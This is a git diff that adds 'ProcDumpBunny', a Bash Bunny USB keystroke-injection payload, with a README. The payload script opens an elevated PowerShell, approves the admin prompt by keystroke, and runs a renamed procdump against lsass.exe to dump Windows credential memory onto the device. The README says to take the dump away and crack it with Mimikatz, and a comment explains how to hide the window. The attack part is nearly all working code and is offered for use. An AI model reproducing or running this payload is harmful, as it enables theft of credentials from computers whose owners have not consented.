diff --git a/payloads/library/credentials/ProcDumpBunny/README.md b/payloads/library/credentials/ProcDumpBunny/README.md
new file mode 100644
index 00000000..31b9ef73
--- /dev/null
+++ b/payloads/library/credentials/ProcDumpBunny/README.md
@@ -0,0 +1,21 @@
+**Title: ProcDumpBunny**
+
+Author: 0iphor13
+
+Version: 1.0
+
+What is ProcDumpBunny?
+#
+*It is simple - using a renamed version of procdump - you are able to dump hashes from lsass.exe*
+#
+
+**Instruction:**
+
+Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
+Place Bunny.exe in the same payload switch as your payload
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
+#
+Plug in BashBunny.
+Exfiltrate the out.dmp file and read it with Mimikatz.
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
diff --git a/payloads/library/credentials/ProcDumpBunny/Screenshot (37).png b/payloads/library/credentials/ProcDumpBunny/Screenshot (37).png
new file mode 100644
index 00000000..37126293
Binary files /dev/null and b/payloads/library/credentials/ProcDumpBunny/Screenshot (37).png differ
diff --git a/payloads/library/credentials/ProcDumpBunny/Screenshot (38).png b/payloads/library/credentials/ProcDumpBunny/Screenshot (38).png
new file mode 100644
index 00000000..990830a9
Binary files /dev/null and b/payloads/library/credentials/ProcDumpBunny/Screenshot (38).png differ
diff --git a/payloads/library/credentials/ProcDumpBunny/Screenshot (39).png b/payloads/library/credentials/ProcDumpBunny/Screenshot (39).png
new file mode 100644
index 00000000..e8e4be20
Binary files /dev/null and b/payloads/library/credentials/ProcDumpBunny/Screenshot (39).png differ
diff --git a/payloads/library/credentials/ProcDumpBunny/payload.txt b/payloads/library/credentials/ProcDumpBunny/payload.txt
new file mode 100644
index 00000000..b0275b7e
--- /dev/null
+++ b/payloads/library/credentials/ProcDumpBunny/payload.txt
@@ -0,0 +1,45 @@
+#!/bin/bash
+#
+# Title:         ProcDumpBunny
+# Description:   Dump lsass.exe with a renamed version of procdump
+# Author:        0iphor13
+# Version:       1.0
+# Category:      Credentials
+# Attackmodes:   HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+#After you have adapted the delays for your target, add "-W hidden"
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+#Depending on your language - you need to change this - english layout: "Q ALT y" for example
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Bunny.exe -ma lsass.exe out.dmp')"
+Q DELAY 250
+Q STRING " ;mv out.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
+Q DELAY 250
+Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH